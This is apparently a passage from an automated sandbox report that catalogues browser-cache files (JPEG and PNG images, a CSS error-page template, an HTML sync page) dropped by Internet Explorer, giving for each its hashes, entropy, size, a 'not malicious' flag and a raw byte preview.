                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.e..f.n7m!.)Gb.......8..h*......@.p.y.r-.j.WT.uZ9........O~..3f...'}..}GzRcQ.g$p.;p.J..-"....H..)..{P;......m`0...Z.".H<..b.d...R.*,"w.]..U?.Fjl29.7.f.@q.qE.VD..&H.P.q9[...J,......gLmq.:.LF|....H.c ......3...hGM.[_*.y.. ..h.\u.$Q......V.d.....dW..z...],r.*rG.hl,2FDs.2....b...h....<.zS...=.q..^rp9.R..(. ....HRz.S.X.......h.L..|P!0.$.(../...h...u..U&.pG....B.....~..2.....1\
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgbmq[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):6289
                                                Entropy (8bit):7.851523332145787
                                                Encrypted:false
                                                SSDEEP:96:QfQErg7WA8UKQ9FQeAAdE7XqMnyVvzoTUtmnw66zfMcg84pGEuji9zoybBbqr:Qoag7WA8liF669N36eEtjpG9jFY2
                                                MD5:07F426B9CCD868F4A649262096340195
                                                SHA1:0FBB15A464AA610660FA0C4FC0DC541AF1714797
                                                SHA-256:D2CB2DD7DAE25A68EFB5F3365A6ECCF7D1754A497FA0CB933DF6753E395A5CB9
                                                SHA-512:5E79975D852BF819A942CD6FAE7744AD75A081EC1562F4F243CD01B86B5CCECEF7976D239AED3D30A215922D5CD239F329BA2E970364365571C8CB7CDD833B2C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j.....N..w.....Z......h..............H(..@....@.a@.#..g\.@...&M!.:........f.q.;..D.@..%.........p..4.C@.4....6......<..8..x.....".#<P..6..P..4G..&..c.7.q.....v.M.s.U\,t5D.@.......3@.@...P...m!.h..."j.e.(...@......p....l....t...#....&....f"..=.(..jr...@.{.Y"..@..7..&9..P.(....@.4.F..`..(.<.......P..$..}0..@#.(...."../ulZF.CRY.u.o.8.,V}3gj..=^.......a<....:.......f.P.y. .;x...PX..9
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgg4w[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):34427
                                                Entropy (8bit):7.918466298596994
                                                Encrypted:false
                                                SSDEEP:768:I+HFDaHrcAEP0XopJxu7HSOGTD4GO23d7IGbKjfGZ:I+BaHTEP0+JxEHyDs23d8sKSZ
                                                MD5:8A893F65E7371978DBB67255A0EC14C2
                                                SHA1:E718E3AABA11B0D5879A00C27DAA901F93D2A7B5
                                                SHA-256:4DB575F619B4A904FA76FC2F85A217971B39FD20B61B3779C9D4FF6701984D44
                                                SHA-512:AD3D6E1A48D2F2E59B2516F563CB31E586BEE00C47F2B85E6B95D31ECDC77703FBA4E4A477EB5E4C98B3975195EBA296436DB03C25D49DEEEF774F886B13DF93
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+B.*.@..E.(...4....FM... ....;.Z.\.LC....H...qC....C.Tc.W..w..<t.".Pc.1..\}..L`...R...E!...vn ..y85.#F...-...P.@......P.@......P.@....P.@....P.@....P.@....P.@....P.@....P.@.@....P.@....P...L....3@.@.h...yJ.V@.E........P..~8.._Z@H(.ni.t......i..8.....-.x... .P.L..r).qR..@.l.3..UnE1.........u.c6Ra..( ....@..-...P.@....P.@.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@.@.......b..P
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOggwL[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):12998
                                                Entropy (8bit):7.957875205331213
                                                Encrypted:false
                                                SSDEEP:384:bOhTptS/mgGPq4AQF+2SK2Fdtlr0voY49wNPci77P:bOhbSugGPq4zFotlr0uIP
                                                MD5:1D942C6E3EDD1A02F198321F9F653842
                                                SHA1:CB8A9BCC50B7001222AA6ED0070701A91E8D48E1
                                                SHA-256:8C71199E78444BF4AF8F2FB06A29084CB7A3B79605DC8C7027A01AE146BCDCC2
                                                SHA-512:245C76AFABA723A5F404DBEF1FDAA3A35B97D58B9C0A5AF4467D64E4821A0B8A9CF8BCF4E46145A9E39D224C996AC06A4D625BDF21C0DBD6C5C027B70AA3D37E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:@...*9`M0.9.y....N2zR.(...4l.g?5&.p...].....d.D.0.T.J...%..,....(e!...iC...].....b....b....O..A..d4Ykg)...G1\..8\.....94i.S.N.6.e..7...X....X.r...}+D....&....@...G<u...]+\.<P..id..y$....++.......`.<..-......=j#.F5.4...G.cr.....ZZ....>l..;..Z...s.Z......`% .T.N0(...pN=..(...^.9..-...~.'..`RJ.B0:....n....O"n.....kJ7..IY....B...................P2._1C..Q-...M..:b.Y.H.....q.../..v
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgmIX[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                Category:dropped
                                                Size (bytes):12089
                                                Entropy (8bit):7.904789531773816
                                                Encrypted:false
                                                SSDEEP:192:QtIaSD1Y9EN+brlhrr8hJ+sDbecdnERkmMtGLhsDmZrgnbLGKnVDXZJ/29qtJXmq:+IaSD1XEbYn+sDbecy/MtGLhrdWdX/2A
                                                MD5:545034BC80A1AACF34CC4EDC5C66F0F4
                                                SHA1:AB11903457FF4F7CCF18CD685EF33CD037BF1965
                                                SHA-256:AE3C9594D1A49BB4B2F04659BF6131D989BE980275C1E12DF7683A2FE804E4B9
                                                SHA-512:EBA05B272F6FF630B31551EC7508B470F18B1817B30988D74B1A80FB4C5BA220E153CBED4E9BE5FC6638B26178E80934F1A2872F69898FB33B916D86CB54E8FA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..zb..Z.J.Z.(.h.(.....@...C...zS.6..R.>d>...".....p..h.....Y..QrUW$.).......f1K[Ye.d.....U...!...{.......P.t{y5e....vo.]RD...c..#s..g...Y..<)o#.....?...W.kH.{;.i...6...c_|f..Y=.J.l\X.......(..)\..(..P................ P.I&..(.h.......@......Z.(......(....Z.;S........)..1@.I4.C-.Jr...E."..2J.M..l..9..x.4.m..d.#..O...8V.N....R.6r.......g..l..[M[bH.$.......;=.....M.....(....(...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgs0a[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):13020
                                                Entropy (8bit):7.879416972104943
                                                Encrypted:false
                                                SSDEEP:384:N3pY6zGTzlrB4GOhxp1FCoQINdi52hZl+uuZj3os:N3pshEDpfChgi5YJGF
                                                MD5:3A0523D4AD4D5B3845A7FD0680E9288B
                                                SHA1:3510C6877C97E5B21141D3AD7DDD46F05E365054
                                                SHA-256:CE5C0C7C063D0C19DC10A6D8ACDFCCAB2623AB8A889147C11757BDA8A04E514F
                                                SHA-512:EE5922D8E1A257FD3504FEC129EA8CCA2CEFDE2798F5B2638045BBB4DF6671DEE93361A9773F59FC29B0DC534BC78762211BFB1758C8B3E8E16ED31FF7A0D4CD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....QB......]..m..m...`(L.....A..1@.(....(.q@...\P1@......b....-!.(....(.......qA..........OD..m..P.s.r..@.(3.......4..=.@..@."...0 QA#.@.(.qL..@...\P......b....m...0.P...\P.....(........(......(.........S.d..~f...j.)9.. .....i...)..P.E.V......b....(...(.q@...6.......1H.m0....h.m.....(.@...!...1@...(.........H...].....p..J.......... P1......P!.P..@...$p.....(..P..@..Hb.,..@....b...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOguTA[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):8913
                                                Entropy (8bit):7.92704245333277
                                                Encrypted:false
                                                SSDEEP:192:Qo4x+X1wBOZURMxGfEa2Nbe/e33DLBH86cg2w:bnXqB0sVEa2Y/03xH8zw
                                                MD5:6A4DF2C42DA5EA53EA4B3A6CD2EDB5D2
                                                SHA1:10B2E4A7F7730E8D6BF42F121D42432C26CFC089
                                                SHA-256:D33985B0529FA6B886C455C39EE3946F11CB18336F038C72BC710C6D36CFCF03
                                                SHA-512:062B790B4B455BE51348700A0065E5C35D13A14ECFADB4AFFBF51578FA03D77BB579D745C031FA84C0E612E30729E91FABB4D626178240A868F74F7C05782D39
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4....P..R...^H..."....../v~?!@.W.$...........h..s..........5.M....9=.....R.W)4.......:;......,.!K.......Jv..p....:...r.n.Xu.CHd"....3..v&....!_.'pN..Z...I.v..Kk...........$.qh.".W.8>.D....(......J.(.JC..k0.u>....r.9..1.Mu.Y.........;..8....?.R.R...z.r...#.,O..k6.j.c...9f$....3.....RD.0I...{Qa\k..(....6'......6...#..h...FF>o.Z..q.....jC.%rs...>q....dw.....4.cwJ...U$..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgvnc[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):13697
                                                Entropy (8bit):7.848115090089445
                                                Encrypted:false
                                                SSDEEP:192:Q2W3xN4uVWuPUZ3taz4XwR6SrWyBOvf/MWnxdmYpCgco83DCFxPoCOS1YAOHJpwt:NW3xN4u8yUZ3Iz4XwR/mmn2FxP4AO0zX
                                                MD5:F4EFBC68289CAF3A7B9073AF2E9E0BD1
                                                SHA1:46C041D8BBC0AF52E388432795B49D050E7A0A43
                                                SHA-256:4EB34F73471CABFCBC78439D42AF69831807D25F5ACD8151559BED13139D8DE1
                                                SHA-512:BE7E716E94EF3FC30C33D62EE15851E0F7CF635197901C088446AEB3F2B1BF8CC20F7D5B4C2F055A478EB3E622ABE981C0CC3754C0B144E485D5ADC79D0B36A3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..t...,(.B..P.P..v.0).]..4..u.<....W.f....P..y9....,.p.x=...j...F..Rk.iLJ2..;..R\I.....d..C...v...p. .|.!.}.qL....@...#.4.;.$z.`..q....... ..3....p98..d#.$P.RJ......1....1.Ua....N....^{.@...F.....P..^..2H.$.... &8....=.+.Uq...v..7$u.p.&..s@.Hga..q.s..B..@...}.h...=h.U.P(...g..T.....b......|....<.=(..K......q.EyQD.B...g.0*.!.<F..@.h.$X.....$.C.n...s.5....4V.^..O.C.......I=.:
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOgzB2[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                Category:dropped
                                                Size (bytes):2573
                                                Entropy (8bit):7.808660714708082
                                                Encrypted:false
                                                SSDEEP:48:QfAuETAvMK8GJOxgUXMdjA2XZH+XN4zPdn82nVrnF4J:Qf7ETKlUfcdzpeXOzVnFnVruJ
                                                MD5:C32C7CC30144AC309E0FD9922D4611CA
                                                SHA1:441EFE87996A8CD7CB25D39054DDE0E3ED3AAEA5
                                                SHA-256:0242664F6C06D24F965A06EEFDCA3768D1F607B55B50D4FAEAF242244AD81540
                                                SHA-512:52A610FD596D00E94D21E4FD1A7D7D1708DC09BAC6C68C302367589DCC08FC9E65ECA2E396BFAE1AF2F9826057CF089C5A1778E4FD25DDF07C62DB52AD955A75
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(......(......(.+....%..m.B......|P.7[..$.>~..7.....x.}c..V.=....I..0.}.Oj..r.;...d....K.o...].w>1...;{.~..omF.....:0ea.A."......*.b..I4.++...=A.......(.+.x...@.J..Oph...|.......{TBa.....b>.c?wn..`..,0..iz...~FQ...T.%H.K...V......E.za....h..dH..w..j.YT..9.D._.=.5.....C..d.. .u....Eu:Z.Ms'.........Y...;.R.l........S(.+15ua.[.n"..7......pGq.y.ME4....R......x.......
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB15AQNm[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):29565
                                                Entropy (8bit):7.9235998300887145
                                                Encrypted:false
                                                SSDEEP:384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
                                                MD5:6B79D1438D8EFAF3B8DE6163107CEC71
                                                SHA1:E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
                                                SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                                SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4.m.!....4..i..4..l.C..u .pi....dRe#J..\..t..bC3.)..l.".W.#..&.....-&2.".&.(l..y...r...cE.7..h(#......t..E.....H.^b..../...5 ..r..4&R.>F.. ~..$..R.....1..WDV.L..j.^q..!...T.+..x.$.+._..<{Tc4!.^\$q.ZR`q...Y........A.Ld...(HM.....Z#2b.u40 ...J.F.j.*...Fy.."h..g.&...+H..$2...A....N.c.L...^..c...<Qa..[.. -..v.....-....xg.K.e+..'5[.... !@.ZM.b."....<.........~....(..".~
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1fdtSt[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):438
                                                Entropy (8bit):7.245257101036661
                                                Encrypted:false
                                                SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                                MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                                SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                                SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                                SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+.....hIDATx...O+DQ../]....f..(,.,-.!.L..X..ee.,.. .I.D..h..P,&.|.c.L.i.E.{.k..~.}.}........t...W...*.5.2..0)X0I.c.wbU.....N..,....-F...J#lSq.;....a...*.....D .w.g..N.....F)l..........`_..s..A;?.4..+..ob......Qh.H.:A......(....;.z./..?.:...t.[.e..b.......{..t.A....M..0.>8&_"... Ev.Z`.."...=/..F.}X....#|.Ny. Z......W...{HX;..F..w..M:...?W.<4B..!.I.....l.o...s....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1kc8s[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):893
                                                Entropy (8bit):7.702979580339968
                                                Encrypted:false
                                                SSDEEP:24:5yrGVrpvzYKWJzgT7w2CGZi1/BwIBCHL/P:srG1pLYPJzY7w/G4OIKLH
                                                MD5:CD8DFD7D16B4BA3E2873EE06DB780B06
                                                SHA1:E8A79F0671D287E116C76FAA5F0E8A4099E0BD23
                                                SHA-256:88E6642487D0F944C6A020133CAE030781CFDCB518802419F10AD78937BDA6DF
                                                SHA-512:199AA29EF33317A43D1C6DF434DD5F9D0FF54BF363CCB1948A970C7EC6889B083565E85E0A140FCDFC38B675CA3EB24DEA0659897EF0450CEF43444E1CEFDA8B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR.............;0......pHYs..........+...../IDATx..]H.Q......LG.LW..Ha..:?.f_l...l.a..........z.a.e.=)....D...'c.E_...F.&).\...4....x...:...=..g.?.....>...'......b......I=.*.Z...V.o.....O........i4............9qjpWWW.P(|.T*M....}@0 ......Es .x...}.n..J.?....C(...V.UY[[.`........R.v..wvv........g.....v...H.....x......4.0..b.\v:.v\kN^'.`.....gb..y....FX,.y.J..............~.s..x<?.+...l6qYY..hT...A^^.....#.H....q}.^..r.o....WWW?....S.)...D..)..Qz.`0..f..T.t.VVV`ss.0:PQQ.MMM....p8...........`......H*..#'=......o.H$.......L&.,?..x.....(%.....c}.0DPPP@.3........t....=Xb.r.`aa......dr.E..u....6,.j-c;11......p8..(.LJ.d2..n..BaL...(..6.-...e..Z?.<...M...5hmm...|*..................`4.qjj....d$..CsQtLUUU.%.....N....Wn~~.:...=.........(===..$Z.......h4....$.c.q.LM...xgffl...r.O.........}....(.Y.{{{.+.2.M..8.P..89"g6...B.l..Z.....o.....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBK9Hzy[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):480
                                                Entropy (8bit):7.323791813342231
                                                Encrypted:false
                                                SSDEEP:12:6v/7BusWIjbykLNgdQLPhgZPwb6txC3nUPuZZcb:MW6bykxgSh6a6TCStb
                                                MD5:163E7CEBA4224A9D25813CD756D138CC
                                                SHA1:062FFF66A1E7C37BAE1ECE635034A03C54638D50
                                                SHA-256:14525F17E552171DEE6D57C932287048185BE36D9AC25DA79CB02AD00657DEAF
                                                SHA-512:C37D77C1414B75CE6E3A90087B3C1E9D57AF6BCA4C140F1F4F43503D89C849EE1143315260A4DF92F1DD273305C15121FF199C04E946FA3BBD98B9B1D6636069
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx..R=H.Q.}...?....!... ..0h.B......!!.......h.j.........%i.J..%.5.:.._c.u.x.=....wQ...?.L.\E..] ...O.&.m..l.U.z..M6.....9.....(....3...x.O!3.....o&}.........]*.w....x..s.%..4.E.WX..{..!....4...2hB...c.m...]m0W."Y.,.2n.W..P.U.a .p...f.\gV....:0.4e........^s 4.j..0...u..*..t6....v..4...c8.4...0./i.Dh..../[t..h.5...!E$.....+..r..C.v......T<.....S..*z#.:...p.B.....").}R........=.....w.e......IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\NewErrorPageTemplate[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\NewErrorPageTemplate[2]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[2].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):21628
                                                Entropy (8bit):5.304819777739522
                                                Encrypted:false
                                                SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                Malicious:false
                                                Reputation:unknown
